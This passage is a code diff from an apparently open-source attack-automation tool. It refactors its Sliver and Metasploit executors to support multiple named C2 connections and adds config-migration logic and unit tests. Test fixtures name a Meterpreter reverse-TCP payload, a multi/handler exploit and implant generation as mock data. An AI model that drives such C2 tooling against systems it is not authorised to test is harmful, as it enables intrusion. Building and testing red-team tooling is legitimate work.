+                        self.add_or_queue_session(conn_name, name, v['exploit_uuid'], queue, session_id)
                         self.logger.debug(f'Sessions: {msfsessions.list}')
                         return

--- a/src/attackmate/executors/sliver/sliverclientmixin.py
+++ b/src/attackmate/executors/sliver/sliverclientmixin.py
@@ -1,0 +1,33 @@
+import logging
+from typing import Dict
+from sliver import SliverClientConfig, SliverClient
+from attackmate.schemas.base import BaseCommand
+from attackmate.schemas.config import SliverConfig
+from attackmate.execexception import ExecException
+
+
+class SliverClientMixin:
+    sliver_config: Dict[str, SliverConfig]
+    _sliver_clients: Dict[str, SliverClient]
+    logger: logging.Logger
+
+    def _resolve_connection(self, command: BaseCommand) -> str:
+        conn = getattr(command, 'connection', None)
+        if conn:
+            return conn
+        if self.sliver_config:
+            conn_name = next(iter(self.sliver_config))
+            self.logger.debug(f'No connection specified, using default: {conn_name}')
+            return conn_name
+        raise ExecException('No Sliver connections configured')
+
+    def _get_client(self, conn_name: str) -> SliverClient:
+        if conn_name not in self._sliver_clients:
+            if conn_name not in self.sliver_config:
+                raise ExecException(f"Sliver connection '{conn_name}' not found in config")
+            config = self.sliver_config[conn_name]
+            if not config.config_file:
+                raise ExecException(f"Sliver connection '{conn_name}' has no config_file")
+            client_config = SliverClientConfig.parse_config_file(config.config_file)
+            self._sliver_clients[conn_name] = SliverClient(client_config)
+        return self._sliver_clients[conn_name]

--- a/src/attackmate/executors/sliver/sliverexecutor.py
+++ b/src/attackmate/executors/sliver/sliverexecutor.py
@@ -6,8 +6,8 @@ Execute Sliver Commands
 
 import os
 import tempfile
-from typing import Any, Optional
-from sliver import SliverClientConfig, SliverClient
+from typing import Any, Dict, Optional
+from sliver import SliverClient
 from sliver.protobuf import client_pb2
 from attackmate.variablestore import VariableStore
 from attackmate.executors.baseexecutor import BaseExecutor
@@ -15,25 +15,26 @@ from attackmate.execexception import ExecException
 from attackmate.result import Result
 from attackmate.executors.features.cmdvars import CmdVars
 from attackmate.schemas.base import BaseCommand
+from attackmate.schemas.config import SliverConfig
 from attackmate.schemas.sliver import SliverGenerateCommand, SliverHttpsListenerCommand
+from attackmate.executors.sliver.sliverclientmixin import SliverClientMixin
 from attackmate.processmanager import ProcessManager
 
 from attackmate.executors.executor_factory import executor_factory
 
 
 @executor_factory.register_executor('sliver')
-class SliverExecutor(BaseExecutor):
+class SliverExecutor(SliverClientMixin, BaseExecutor):
 
-    def __init__(self, pm: ProcessManager, cmdconfig=None, *, varstore: VariableStore, sliver_config=None):
+    def __init__(
+        self, pm: ProcessManager, cmdconfig=None, *,
+        varstore: VariableStore, sliver_config: Dict[str, SliverConfig] = {}
+    ):
         self.sliver_config = sliver_config
-        self.client = None
+        self._sliver_clients: Dict[str, SliverClient] = {}
+        self.client: Optional[SliverClient] = None
         self.tempfilestore: list[Any] = []
-        self.client_config = None
         self.result = Result('', 1)
-
-        if self.sliver_config.config_file:
-            self.client_config = SliverClientConfig.parse_config_file(sliver_config.config_file)
-            self.client = SliverClient(self.client_config)
         super().__init__(pm, varstore, cmdconfig)
 
     async def connect(self) -> None:
@@ -139,33 +140,34 @@ class SliverExecutor(BaseExecutor):
         """
         Cleans up listeners (jobs), sessions, and beacons to release ports and resources.
         """
-        if not self.client:
-            return
-        try:
-            if not self.client.is_connected:
-                await self.client.connect()
-            # 1. Kill Jobs (releases ports)
-            jobs = await self.client.jobs()
-            for job in jobs:
-                self.logger.debug(f'Killing sliver job {job}')
-                await self.client.kill_job(job.ID)
-            # 2. Kill Sessions
-            sessions = await self.client.sessions()
-            for session in sessions:
-                self.logger.debug(f'Killing sliver session {session.ID}')
-                await self.client.kill_session(session.ID)
-            # 3. Kill Beacons
-            beacons = await self.client.beacons()
-            for beacon in beacons:
-                self.logger.debug(f'Killing sliver beacon {beacon.ID}')
-                await self.client.kill_beacon(beacon.ID)
-        except Exception as e:
-            self.logger.error(f'Error during SliverExecutor cleanup: {e}')
+        for conn_name, client in self._sliver_clients.items():
+            try:
+                if not client.is_connected:
+                    await client.connect()
+                # 1. Kill Jobs (releases ports)
+                jobs = await client.jobs()
+                for job in jobs:
+                    self.logger.debug(f'Killing sliver job {job}')
+                    await client.kill_job(job.ID)
+                # 2. Kill Sessions
+                sessions = await client.sessions()
+                for session in sessions:
+                    self.logger.debug(f'Killing sliver session {session.ID}')
+                    await client.kill_session(session.ID)
+                # 3. Kill Beacons
+                beacons = await client.beacons()
+                for beacon in beacons:
+                    self.logger.debug(f'Killing sliver beacon {beacon.ID}')
+                    await client.kill_beacon(beacon.ID)
+            except Exception as e:
+                self.logger.error(f'Error during SliverExecutor cleanup for {conn_name}: {e}')
 
     def log_command(self, command: BaseCommand):
         self.logger.info(f"Executing Sliver-command: '{command.cmd}'")
 
     async def _exec_cmd(self, command: BaseCommand) -> Result:
+        conn_name = self._resolve_connection(command)
+        self.client = self._get_client(conn_name)
         await self.connect()
         try:
             if command.cmd == 'start_https_listener' and isinstance(command, SliverHttpsListenerCommand):

--- a/src/attackmate/executors/sliver/sliversessionexecutor.py
+++ b/src/attackmate/executors/sliver/sliversessionexecutor.py
@@ -7,7 +7,8 @@ Execute Commands in a Sliver Session
 import asyncio
 import os
 import gzip
-from sliver import SliverClientConfig, SliverClient
+from typing import Dict, Optional
+from sliver import SliverClient
 from sliver.session import InteractiveSession
 from sliver.beacon import InteractiveBeacon
 
@@ -16,6 +17,8 @@ from attackmate.variablestore import VariableStore
 from attackmate.executors.baseexecutor import BaseExecutor
 from attackmate.execexception import ExecException
 from attackmate.result import Result
+from attackmate.schemas.config import SliverConfig
+from attackmate.executors.sliver.sliverclientmixin import SliverClientMixin
 from attackmate.schemas.sliver import (
     SliverSessionCDCommand,
     SliverSessionCommand,
@@ -38,17 +41,16 @@ from attackmate.executors.executor_factory import executor_factory
 
 
 @executor_factory.register_executor('sliver-session')
-class SliverSessionExecutor(BaseExecutor):
+class SliverSessionExecutor(SliverClientMixin, BaseExecutor):
 
-    def __init__(self, pm: ProcessManager, cmdconfig=None, *, varstore: VariableStore, sliver_config=None):
+    def __init__(
+        self, pm: ProcessManager, cmdconfig=None, *,
+        varstore: VariableStore, sliver_config: Dict[str, SliverConfig] = {}
+    ):
         self.sliver_config = sliver_config
-        self.client = None
-        self.client_config = None
+        self._sliver_clients: Dict[str, SliverClient] = {}
+        self.client: Optional[SliverClient] = None
         self.result = Result('', 1)
-
-        if self.sliver_config.config_file:
-            self.client_config = SliverClientConfig.parse_config_file(sliver_config.config_file)
-            self.client = SliverClient(self.client_config)
         super().__init__(pm, varstore, cmdconfig)
 
     async def connect(self) -> None:
@@ -276,27 +278,28 @@ class SliverSessionExecutor(BaseExecutor):
             await asyncio.sleep(seconds)
 
     async def cleanup(self):
-        if not self.client:
-            return
-        try:
-            if not self.client.is_connected:
-                await self.client.connect()
-            sessions = await self.client.sessions()
-            for session in sessions:
-                self.logger.debug(f'Killing sliver session {session.ID}')
-                await self.client.kill_session(session.ID)
-            beacons = await self.client.beacons()
-            for beacon in beacons:
-                self.logger.debug(f'Killing sliver beacon {session.ID}')
-                await self.client.kill_beacon(beacon.ID)
-            jobs = await self.client.jobs()
-            for job in jobs:
-                self.logger.debug(f'Killing sliver job {job}')
-                await self.client.kill_job(job.ID)
-        except Exception as e:
-            self.logger.error(f'Error cleaning up sliver sessions: {e}')
+        for conn_name, client in self._sliver_clients.items():
+            try:
+                if not client.is_connected:
+                    await client.connect()
+                sessions = await client.sessions()
+                for session in sessions:
+                    self.logger.debug(f'Killing sliver session {session.ID}')
+                    await client.kill_session(session.ID)
+                beacons = await client.beacons()
+                for beacon in beacons:
+                    self.logger.debug(f'Killing sliver beacon {beacon.ID}')
+                    await client.kill_beacon(beacon.ID)
+                jobs = await client.jobs()
+                for job in jobs:
+                    self.logger.debug(f'Killing sliver job {job}')
+                    await client.kill_job(job.ID)
+            except Exception as e:
+                self.logger.error(f'Error cleaning up sliver sessions for {conn_name}: {e}')
 
     async def _exec_cmd(self, command: SliverSessionCommand) -> Result:
+        conn_name = self._resolve_connection(command)
+        self.client = self._get_client(conn_name)
         await self.connect()
         try:
             if command.cmd == 'cd' and isinstance(command, SliverSessionCDCommand):

--- a/src/attackmate/schemas/config.py
+++ b/src/attackmate/schemas/config.py
@@ -1,4 +1,4 @@
-from pydantic import BaseModel
+from pydantic import BaseModel, field_validator
 from typing import Optional, Dict
 
 
@@ -34,8 +34,30 @@ class RemoteConfig(BaseModel):
 
 
 class Config(BaseModel):
-    sliver_config: SliverConfig = SliverConfig(config_file=None)
-    msf_config: MsfConfig = MsfConfig(password=None)
+    sliver_config: Dict[str, SliverConfig] = {}
+    msf_config: Dict[str, MsfConfig] = {}
     cmd_config: CommandConfig = CommandConfig(loop_sleep=5, command_delay=0)
     bettercap_config: Dict[str, BettercapConfig] = {}
     remote_config: Dict[str, RemoteConfig] = {}
+
+    @field_validator('msf_config', mode='before')
+    @classmethod
+    def migrate_msf_config(cls, v):
+        # Old configs had a single flat MsfConfig dict (keys: password, ssl, port, server, uri).
+        # New configs are Dict[str, MsfConfig] with named connections.
+        # Detect the old format by checking for known MsfConfig field names at the top level.
+        # .intersection() only requires one match, unspecified fields fall back to their Pydantic defaults.
+        # Wrapping it under 'default'
+        # !! Note !! : connection names that coincide with MsfConfig field names (e.g. 'server')
+        # would be misdetected as old format and should be avoided.
+        if isinstance(v, dict) and {'password', 'ssl', 'port', 'server', 'uri'}.intersection(v.keys()):
+            return {'default': v}
+        return v
+
+    @field_validator('sliver_config', mode='before')
+    @classmethod
+    def migrate_sliver_config(cls, v):
+        # Same backwards-compatibility migration as migrate_msf_config above.
+        if isinstance(v, dict) and {'config_file'}.intersection(v.keys()):
+            return {'default': v}
+        return v

--- a/src/attackmate/schemas/config.py
+++ b/src/attackmate/schemas/config.py
@@ -43,21 +43,29 @@ class Config(BaseModel):
     @field_validator('msf_config', mode='before')
     @classmethod
     def migrate_msf_config(cls, v):
-        # Old configs had a single flat MsfConfig dict (keys: password, ssl, port, server, uri).
-        # New configs are Dict[str, MsfConfig] with named connections.
-        # Detect the old format by checking for known MsfConfig field names at the top level.
-        # .intersection() only requires one match, unspecified fields fall back to their Pydantic defaults.
-        # Wrapping it under 'default'
-        # !! Note !! : connection names that coincide with MsfConfig field names (e.g. 'server')
-        # would be misdetected as old format and should be avoided.
-        if isinstance(v, dict) and {'password', 'ssl', 'port', 'server', 'uri'}.intersection(v.keys()):
+        # Handle a bare MsfConfig instance passed by embedded-API callers.
+        if isinstance(v, MsfConfig):
+            return {'default': v}
+        # Old configs had a single flat MsfConfig dict (keys: password, ssl, port, server, uri)
+        # Detect the old format by  a known field name AND at least one scalar value
+        # avoids misdetecting a new-format connection named e.g. 'server'.
+        # wrapping in "default"
+        msf_fields = {'password', 'ssl', 'port', 'server', 'uri'}
+        if (isinstance(v, dict)
+                and msf_fields.intersection(v.keys())
+                and any(not isinstance(val, dict) for val in v.values())):
             return {'default': v}
         return v
 
     @field_validator('sliver_config', mode='before')
     @classmethod
     def migrate_sliver_config(cls, v):
-        # Same backwards-compatibility migration as migrate_msf_config above.
-        if isinstance(v, dict) and {'config_file'}.intersection(v.keys()):
+        # Handle a bare SliverConfig instance passed by embedded-API callers.
+        if isinstance(v, SliverConfig):
+            return {'default': v}
+        # Same check as above (only one field: config_file)
+        if (isinstance(v, dict)
+                and {'config_file'}.intersection(v.keys())
+                and any(not isinstance(val, dict) for val in v.values())):
             return {'default': v}
         return v

--- a/src/attackmate/schemas/metasploit.py
+++ b/src/attackmate/schemas/metasploit.py
@@ -19,6 +19,7 @@ class MsfSessionCommand(BaseCommand):
     read: bool = False
     session: str
     end_str: Optional[str] = None
+    connection: Optional[str] = None
 
 
 @CommandRegistry.register('msf-payload')
@@ -36,6 +37,7 @@ class MsfPayloadCommand(BaseCommand):
     iter: StringNumber = '0'
     payload_options: Dict[str, str] = {}
     local_path: Optional[str] = None
+    connection: Optional[str] = None
 
 
 class MsfModuleCommand(BaseCommand):
@@ -47,6 +49,7 @@ class MsfModuleCommand(BaseCommand):
     payload: Optional[str] = None
     options: Dict[str, str] = {}
     payload_options: Dict[str, str] = {}
+    connection: Optional[str] = None
 
     def is_interactive(self):
         if self.interactive is not None:

--- a/src/attackmate/schemas/sliver.py
+++ b/src/attackmate/schemas/sliver.py
@@ -18,6 +18,7 @@ class SliverHttpsListenerCommand(BaseCommand):
     long_poll_timeout: StringNumber = '1'
     long_poll_jitter: StringNumber = '3'
     timeout: StringNumber = '60'
+    connection: Optional[str] = None
 
 
 @CommandRegistry.register('sliver', 'generate_implant')
@@ -35,6 +36,7 @@ class SliverGenerateCommand(BaseCommand):
     BeaconInterval: StringNumber = '120'
     RunAtLoad: bool = False
     Evasion: bool = False
+    connection: Optional[str] = None
 
 
 @CommandRegistry.register('sliver-session')
@@ -42,6 +44,7 @@ class SliverSessionCommand(BaseCommand):
     type: Literal['sliver-session']
     session: str
     beacon: bool = False
+    connection: Optional[str] = None
 
 
 @CommandRegistry.register('sliver-session', 'cd')

--- a/test/units/test_msfclientmixin.py
+++ b/test/units/test_msfclientmixin.py
@@ -1,0 +1,191 @@
+import pytest
+from unittest.mock import MagicMock, patch
+from pymetasploit3.msfrpc import MsfAuthError
+
+from attackmate.execexception import ExecException
+from attackmate.executors.metasploit.msfexecutor import MsfModuleExecutor
+from attackmate.executors.metasploit.msfsessionexecutor import MsfSessionExecutor
+from attackmate.executors.metasploit.msfpayloadexecutor import MsfPayloadExecutor
+from attackmate.executors.metasploit.msfsessionstore import MsfSessionStore
+from attackmate.schemas.config import MsfConfig
+from attackmate.schemas.metasploit import MsfModuleCommand, MsfSessionCommand, MsfPayloadCommand
+from attackmate.variablestore import VariableStore
+from attackmate.processmanager import ProcessManager
+
+
+@pytest.fixture
+def varstore():
+    return VariableStore()
+
+
+@pytest.fixture
+def pm():
+    return ProcessManager()
+
+
+@pytest.fixture
+def sessionstore(varstore):
+    return MsfSessionStore(varstore)
+
+
+@pytest.fixture
+def single_config():
+    return {'default': MsfConfig(password='secret', server='127.0.0.1')}
+
+
+@pytest.fixture
+def multi_config():
+    return {
+        'server1': MsfConfig(password='pw1', server='127.0.0.1'),
+        'server2': MsfConfig(password='pw2', server='127.0.0.2'),
+    }
+
+
+@pytest.fixture
+def executor_single(pm, varstore, sessionstore, single_config):
+    return MsfModuleExecutor(pm, varstore=varstore, msf_config=single_config, msfsessionstore=sessionstore)
+
+
+@pytest.fixture
+def executor_multi(pm, varstore, sessionstore, multi_config):
+    return MsfModuleExecutor(pm, varstore=varstore, msf_config=multi_config, msfsessionstore=sessionstore)
+
+
+# --- _resolve_connection ---
+
+class TestMsfResolveConnection:
+    def test_no_connection_field_uses_first_entry(self, executor_single):
+        cmd = MsfModuleCommand(type='msf-module', cmd='exploit/multi/handler')
+        assert executor_single._resolve_connection(cmd) == 'default'
+
+    def test_no_connection_field_uses_first_of_multiple(self, executor_multi):
+        cmd = MsfModuleCommand(type='msf-module', cmd='exploit/multi/handler')
+        assert executor_multi._resolve_connection(cmd) == 'server1'
+
+    def test_explicit_connection_overrides_default(self, executor_multi):
+        cmd = MsfModuleCommand(type='msf-module', cmd='exploit/multi/handler', connection='server2')
+        assert executor_multi._resolve_connection(cmd) == 'server2'
+
+    def test_empty_config_raises(self, pm, varstore, sessionstore):
+        executor = MsfModuleExecutor(pm, varstore=varstore, msf_config={}, msfsessionstore=sessionstore)
+        cmd = MsfModuleCommand(type='msf-module', cmd='exploit/multi/handler')
+        with pytest.raises(ExecException, match='No MSF connections configured'):
+            executor._resolve_connection(cmd)
+
+
+# --- _get_client ---
+
+class TestMsfGetClient:
+    def test_connects_lazily_on_first_call(self, executor_single):
+        with patch('attackmate.executors.metasploit.msfclientmixin.MsfRpcClient') as mock_cls:
+            mock_cls.return_value = MagicMock()
+            executor_single._get_client('default')
+            mock_cls.assert_called_once()
+            assert 'default' in executor_single._msf_clients
+
+    def test_passes_config_fields_to_rpc_client(self, executor_single):
+        with patch('attackmate.executors.metasploit.msfclientmixin.MsfRpcClient') as mock_cls:
+            mock_cls.return_value = MagicMock()
+            executor_single._get_client('default')
+            call_kwargs = mock_cls.call_args[1]
+            assert call_kwargs['password'] == 'secret'
+            assert call_kwargs['server'] == '127.0.0.1'
+
+    def test_returns_cached_client_on_subsequent_calls(self, executor_single):
+        with patch('attackmate.executors.metasploit.msfclientmixin.MsfRpcClient') as mock_cls:
+            mock_cls.return_value = MagicMock()
+            first = executor_single._get_client('default')
+            second = executor_single._get_client('default')
+            mock_cls.assert_called_once()
+            assert first is second
+
+    def test_creates_independent_client_per_connection(self, executor_multi):
+        with patch('attackmate.executors.metasploit.msfclientmixin.MsfRpcClient') as mock_cls:
+            mock_cls.side_effect = [MagicMock(), MagicMock()]
+            c1 = executor_multi._get_client('server1')
+            c2 = executor_multi._get_client('server2')
+            assert c1 is not c2
+            assert mock_cls.call_count == 2
+
+    def test_raises_for_unknown_connection_name(self, executor_multi):
+        with pytest.raises(ExecException, match="MSF connection 'unknown' not found in config"):
+            executor_multi._get_client('unknown')
+
+    def test_raises_on_io_error(self, executor_single):
+        with patch('attackmate.executors.metasploit.msfclientmixin.MsfRpcClient',
+                   side_effect=IOError('connection refused')):
+            with pytest.raises(ExecException, match='MSF connection failed'):
+                executor_single._get_client('default')
+
+    def test_raises_on_auth_error(self, executor_single):
+        with patch('attackmate.executors.metasploit.msfclientmixin.MsfRpcClient',
+                   side_effect=MsfAuthError('bad password')):
+            with pytest.raises(ExecException, match='MSF authentication failed'):
+                executor_single._get_client('default')
+
+
+# --- command connection field ---
+
+class TestMsfCommandConnectionField:
+    def test_msf_module_command_defaults_to_none(self):
+        cmd = MsfModuleCommand(type='msf-module', cmd='exploit/multi/handler')
+        assert cmd.connection is None
+
+    def test_msf_module_command_accepts_connection(self):
+        cmd = MsfModuleCommand(type='msf-module', cmd='exploit/multi/handler', connection='server2')
+        assert cmd.connection == 'server2'
+
+    def test_msf_session_command_accepts_connection(self):
+        cmd = MsfSessionCommand(type='msf-session', cmd='sysinfo', session='my_session', connection='server2')
+        assert cmd.connection == 'server2'
+
+    def test_msf_payload_command_accepts_connection(self):
+        cmd = MsfPayloadCommand(
+            type='msf-payload',
+            cmd='windows/meterpreter/reverse_tcp',
+            connection='server1')
+        assert cmd.connection == 'server1'
+
+
+# --- mixin wiring for all three MSF executors ---
+
+class TestMsfExecutorMixinWiring:
+    def test_module_executor_has_resolve_and_get_client(self, pm, varstore, sessionstore, multi_config):
+        executor = MsfModuleExecutor(
+            pm,
+            varstore=varstore,
+            msf_config=multi_config,
+            msfsessionstore=sessionstore)
+        assert hasattr(executor, '_resolve_connection')
+        assert hasattr(executor, '_get_client')
+
+    def test_session_executor_has_resolve_and_get_client(self, pm, varstore, sessionstore, multi_config):
+        executor = MsfSessionExecutor(
+            pm,
+            varstore=varstore,
+            msf_config=multi_config,
+            msfsessionstore=sessionstore)
+        assert hasattr(executor, '_resolve_connection')
+        assert hasattr(executor, '_get_client')
+
+    def test_payload_executor_has_resolve_and_get_client(self, pm, varstore, multi_config):
+        executor = MsfPayloadExecutor(pm, varstore=varstore, msf_config=multi_config)
+        assert hasattr(executor, '_resolve_connection')
+        assert hasattr(executor, '_get_client')
+
+    def test_session_executor_resolves_connection(self, pm, varstore, sessionstore, multi_config):
+        executor = MsfSessionExecutor(
+            pm,
+            varstore=varstore,
+            msf_config=multi_config,
+            msfsessionstore=sessionstore)
+        cmd = MsfSessionCommand(type='msf-session', cmd='sysinfo', session='s', connection='server2')
+        assert executor._resolve_connection(cmd) == 'server2'
+
+    def test_payload_executor_resolves_connection(self, pm, varstore, multi_config):
+        executor = MsfPayloadExecutor(pm, varstore=varstore, msf_config=multi_config)
+        cmd = MsfPayloadCommand(
+            type='msf-payload',
+            cmd='windows/meterpreter/reverse_tcp',
+            connection='server1')
+        assert executor._resolve_connection(cmd) == 'server1'

--- a/test/units/test_multi_connections_config.py
+++ b/test/units/test_multi_connections_config.py
@@ -1,0 +1,102 @@
+from attackmate.schemas.config import Config
+
+
+class TestMsfConfigMigration:
+    def test_old_flat_format_migrated_to_default_key(self):
+        data = {'msf_config': {'password': 'secret', 'server': '127.0.0.1'}}
+        c = Config.model_validate(data)
+        assert 'default' in c.msf_config
+        assert c.msf_config['default'].server == '127.0.0.1'
+        assert c.msf_config['default'].password == 'secret'
+
+    def test_old_flat_format_preserves_all_fields(self):
+        data = {
+            'msf_config': {
+                'password': 'pw',
+                'ssl': False,
+                'port': 55554,
+                'server': '10.0.0.1',
+                'uri': '/rpc/'}}
+        c = Config.model_validate(data)
+        cfg = c.msf_config['default']
+        assert cfg.port == 55554
+        assert cfg.ssl is False
+        assert cfg.uri == '/rpc/'
+
+    def test_new_named_format_single_entry(self):
+        data = {'msf_config': {'myserver': {'password': 'secret', 'server': '10.0.0.1'}}}
+        c = Config.model_validate(data)
+        assert list(c.msf_config.keys()) == ['myserver']
+        assert c.msf_config['myserver'].server == '10.0.0.1'
+
+    def test_new_named_format_multiple_entries(self):
+        data = {
+            'msf_config': {
+                'server1': {'password': 'pw1', 'server': '10.0.0.1'},
+                'server2': {'password': 'pw2', 'server': '10.0.0.2'},
+            }
+        }
+        c = Config.model_validate(data)
+        assert set(c.msf_config.keys()) == {'server1', 'server2'}
+        assert c.msf_config['server1'].server == '10.0.0.1'
+        assert c.msf_config['server2'].server == '10.0.0.2'
+
+    def test_empty_msf_config_stays_empty(self):
+        c = Config()
+        assert c.msf_config == {}
+
+    def test_named_entries_preserve_insertion_order(self):
+        data = {
+            'msf_config': {
+                'primary': {'server': '10.0.0.1'},
+                'secondary': {'server': '10.0.0.2'},
+            }
+        }
+        c = Config.model_validate(data)
+        assert next(iter(c.msf_config)) == 'primary'
+
+
+class TestSliverConfigMigration:
+    def test_old_flat_format_migrated_to_default_key(self):
+        data = {'sliver_config': {'config_file': '/home/user/.sliver/config.cfg'}}
+        c = Config.model_validate(data)
+        assert 'default' in c.sliver_config
+        assert c.sliver_config['default'].config_file == '/home/user/.sliver/config.cfg'
+
+    def test_old_flat_format_with_none_config_file(self):
+        data = {'sliver_config': {'config_file': None}}
+        c = Config.model_validate(data)
+        assert 'default' in c.sliver_config
+        assert c.sliver_config['default'].config_file is None
+
+    def test_new_named_format_single_entry(self):
+        data = {'sliver_config': {'primary': {'config_file': '/path/to/cfg.cfg'}}}
+        c = Config.model_validate(data)
+        assert list(c.sliver_config.keys()) == ['primary']
+        assert c.sliver_config['primary'].config_file == '/path/to/cfg.cfg'
+
+    def test_new_named_format_multiple_entries(self):
+        data = {
+            'sliver_config': {
+                'sliver1': {'config_file': '/path/cfg1.cfg'},
+                'sliver2': {'config_file': '/path/cfg2.cfg'},
+            }
+        }
+        c = Config.model_validate(data)
+        assert set(c.sliver_config.keys()) == {'sliver1', 'sliver2'}
+        assert c.sliver_config['sliver1'].config_file == '/path/cfg1.cfg'
+        assert c.sliver_config['sliver2'].config_file == '/path/cfg2.cfg'
+
+    def test_empty_sliver_config_stays_empty(self):
+        c = Config()
+        assert c.sliver_config == {}
+
+    def test_named_entries_preserve_insertion_order(self):
+        data = {
+            'sliver_config': {
+                'first': {'config_file': '/path/a.cfg'},
+                'second': {'config_file': '/path/b.cfg'},
+            }
+        }
+        c = Config.model_validate(data)
+        assert next(iter(c.sliver_config)) == 'first'

--- a/test/units/test_sliverclientmixin.py
+++ b/test/units/test_sliverclientmixin.py
@@ -1,0 +1,181 @@
+import pytest
+from unittest.mock import MagicMock, patch
+
+from attackmate.execexception import ExecException
+from attackmate.executors.sliver.sliverexecutor import SliverExecutor
+from attackmate.executors.sliver.sliversessionexecutor import SliverSessionExecutor
+from attackmate.schemas.config import SliverConfig
+from attackmate.schemas.sliver import (
+    SliverHttpsListenerCommand,
+    SliverGenerateCommand,
+    SliverSessionSimpleCommand,
+)
+from attackmate.variablestore import VariableStore
+from attackmate.processmanager import ProcessManager
+
+
+@pytest.fixture
+def varstore():
+    return VariableStore()
+
+
+@pytest.fixture
+def pm():
+    return ProcessManager()
+
+
+@pytest.fixture
+def single_config():
+    return {'default': SliverConfig(config_file='/path/to/config.cfg')}
+
+
+@pytest.fixture
+def multi_config():
+    return {
+        'sliver1': SliverConfig(config_file='/path/to/cfg1.cfg'),
+        'sliver2': SliverConfig(config_file='/path/to/cfg2.cfg'),
+    }
+
+
+@pytest.fixture
+def executor_single(pm, varstore, single_config):
+    return SliverExecutor(pm, varstore=varstore, sliver_config=single_config)
+
+
+@pytest.fixture
+def executor_multi(pm, varstore, multi_config):
+    return SliverExecutor(pm, varstore=varstore, sliver_config=multi_config)
+
+
+# --- _resolve_connection ---
+
+class TestSliverResolveConnection:
+    def test_no_connection_field_uses_first_entry(self, executor_single):
+        cmd = SliverHttpsListenerCommand(type='sliver', cmd='start_https_listener')
+        assert executor_single._resolve_connection(cmd) == 'default'
+
+    def test_no_connection_field_uses_first_of_multiple(self, executor_multi):
+        cmd = SliverHttpsListenerCommand(type='sliver', cmd='start_https_listener')
+        assert executor_multi._resolve_connection(cmd) == 'sliver1'
+
+    def test_explicit_connection_overrides_default(self, executor_multi):
+        cmd = SliverHttpsListenerCommand(type='sliver', cmd='start_https_listener', connection='sliver2')
+        assert executor_multi._resolve_connection(cmd) == 'sliver2'
+
+    def test_empty_config_raises(self, pm, varstore):
+        executor = SliverExecutor(pm, varstore=varstore, sliver_config={})
+        cmd = SliverHttpsListenerCommand(type='sliver', cmd='start_https_listener')
+        with pytest.raises(ExecException, match='No Sliver connections configured'):
+            executor._resolve_connection(cmd)
+
+    def test_session_command_connection_resolved(self, executor_multi):
+        cmd = SliverSessionSimpleCommand(
+            type='sliver-session',
+            cmd='pwd',
+            session='test',
+            connection='sliver2')
+        assert executor_multi._resolve_connection(cmd) == 'sliver2'
+
+
+# --- _get_client ---
+
+class TestSliverGetClient:
+    def test_parses_config_file_on_first_call(self, executor_single):
+        with patch('attackmate.executors.sliver.sliverclientmixin.SliverClientConfig') as mock_cfg, \
+                patch('attackmate.executors.sliver.sliverclientmixin.SliverClient'):
+            mock_cfg.parse_config_file.return_value = MagicMock()
+            executor_single._get_client('default')
+            mock_cfg.parse_config_file.assert_called_once_with('/path/to/config.cfg')
+
+    def test_creates_sliver_client_on_first_call(self, executor_single):
+        with patch('attackmate.executors.sliver.sliverclientmixin.SliverClientConfig') as mock_cfg, \
+                patch('attackmate.executors.sliver.sliverclientmixin.SliverClient') as mock_client_cls:
+            mock_cfg.parse_config_file.return_value = MagicMock()
+            mock_client_cls.return_value = MagicMock()
+            executor_single._get_client('default')
+            mock_client_cls.assert_called_once()
+            assert 'default' in executor_single._sliver_clients
+
+    def test_returns_cached_client_on_subsequent_calls(self, executor_single):
+        with patch('attackmate.executors.sliver.sliverclientmixin.SliverClientConfig') as mock_cfg, \
+                patch('attackmate.executors.sliver.sliverclientmixin.SliverClient') as mock_client_cls:
+            mock_cfg.parse_config_file.return_value = MagicMock()
+            mock_client_cls.return_value = MagicMock()
+            first = executor_single._get_client('default')
+            second = executor_single._get_client('default')
+            mock_cfg.parse_config_file.assert_called_once()
+            assert first is second
+
+    def test_creates_independent_client_per_connection(self, executor_multi):
+        with patch('attackmate.executors.sliver.sliverclientmixin.SliverClientConfig') as mock_cfg, \
+                patch('attackmate.executors.sliver.sliverclientmixin.SliverClient') as mock_client_cls:
+            mock_cfg.parse_config_file.return_value = MagicMock()
+            mock_client_cls.side_effect = [MagicMock(), MagicMock()]
+            c1 = executor_multi._get_client('sliver1')
+            c2 = executor_multi._get_client('sliver2')
+            assert c1 is not c2
+            assert mock_client_cls.call_count == 2
+
+    def test_raises_for_unknown_connection_name(self, executor_multi):
+        with pytest.raises(ExecException, match="Sliver connection 'unknown' not found in config"):
+            executor_multi._get_client('unknown')
+
+    def test_raises_when_config_file_is_none(self, pm, varstore):
+        executor = SliverExecutor(pm, varstore=varstore,
+                                  sliver_config={'no_file': SliverConfig(config_file=None)})
+        with pytest.raises(ExecException, match='has no config_file'):
+            executor._get_client('no_file')
+
+
+# --- command connection field ---
+
+class TestSliverCommandConnectionField:
+    def test_https_listener_defaults_to_none(self):
+        cmd = SliverHttpsListenerCommand(type='sliver', cmd='start_https_listener')
+        assert cmd.connection is None
+
+    def test_https_listener_accepts_connection(self):
+        cmd = SliverHttpsListenerCommand(type='sliver', cmd='start_https_listener', connection='sliver2')
+        assert cmd.connection == 'sliver2'
+
+    def test_generate_command_accepts_connection(self):
+        cmd = SliverGenerateCommand(
+            type='sliver', cmd='generate_implant', c2url='https://10.0.0.1', name='implant',
+            connection='sliver1'
+        )
+        assert cmd.connection == 'sliver1'
+
+    def test_session_command_accepts_connection(self):
+        cmd = SliverSessionSimpleCommand(type='sliver-session', cmd='pwd', session='my_session',
+                                         connection='sliver1')
+        assert cmd.connection == 'sliver1'
+
+    def test_session_command_connection_inherited_by_subclasses(self):
+        cmd = SliverSessionSimpleCommand(type='sliver-session', cmd='ps', session='my_session',
+                                         connection='sliver2')
+        assert cmd.connection == 'sliver2'
+
+
+# --- mixin wiring for both Sliver executors ---
+
+class TestSliverExecutorMixinWiring:
+    def test_sliver_executor_has_resolve_and_get_client(self, pm, varstore, multi_config):
+        executor = SliverExecutor(pm, varstore=varstore, sliver_config=multi_config)
+        assert hasattr(executor, '_resolve_connection')
+        assert hasattr(executor, '_get_client')
+
+    def test_sliver_session_executor_has_resolve_and_get_client(self, pm, varstore, multi_config):
+        executor = SliverSessionExecutor(pm, varstore=varstore, sliver_config=multi_config)
+        assert hasattr(executor, '_resolve_connection')
+        assert hasattr(executor, '_get_client')
+
+    def test_session_executor_resolves_connection(self, pm, varstore, multi_config):
+        executor = SliverSessionExecutor(pm, varstore=varstore, sliver_config=multi_config)
